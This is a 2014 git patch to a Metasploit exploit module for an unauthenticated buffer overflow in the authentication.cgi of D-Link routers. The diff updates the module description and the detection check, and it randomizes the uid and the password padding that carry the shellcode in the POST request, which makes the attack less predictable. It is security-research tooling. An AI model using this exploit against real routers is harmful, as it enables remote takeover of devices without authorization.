From f0d04fe77e58339c599bf444dea67bb5508816c3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 20 Jun 2014 11:38:10 -0500
Subject: [PATCH] Do some randomizations

---
 .../http/dlink_authentication_cgi_bof.rb      | 20 +++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb
index 0299255176..d69f4b46c4 100644
--- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb
+++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb
@@ -17,10 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'D-Link authentication.cgi Buffer Overflow',
       'Description'    => %q{
-          This module exploits an anonymous remote code execution vulnerability on different D-Link routers.
-        This module has been tested successfully on D-Link DIR645A1_FW103B11. Different other devices like the
-        DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable and they were tested within an emulated
-        environment. They are a little bit different in the first ROP gadget.
+        This module exploits an remote buffer overflow vulnerability on different D-Link routers.
+        The vulnerability exists in the handling of HTTP queries to the authentication.cgi with
+        long password values. The vulnerability can be exploitable without authentication. This
+        module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares
+        like the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable.
       },
       'Author'         =>
         [
@@ -63,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'method'  => 'GET'
       })
 
-      if res && [200, 301, 302].include?(res.code)
+      if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /status.*uid/
         return Exploit::CheckCode::Detected
       end
     rescue ::Rex::ConnectionError
@@ -113,17 +114,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def execute_command(cmd, opts)
     shellcode = prepare_shellcode(cmd)
-
+    uid = rand_text_alpha(4)
     begin
       res = send_request_cgi({
         'method' => 'POST',
-        #'uri' => "/authentication_gdb.cgi",	#for debugging on the router
         'uri' => "/authentication.cgi",
-        'cookie'   => "uid=test",
+        'cookie'   => "uid=#{uid}",
         'encode_params' => false,
         'vars_post' => {
-          'uid'        => 'test',
-          'password'   => 'asd' << shellcode,
+          'uid'      => uid,
+          'password' => rand_text_alpha(3) + shellcode,
         }
       })
       return res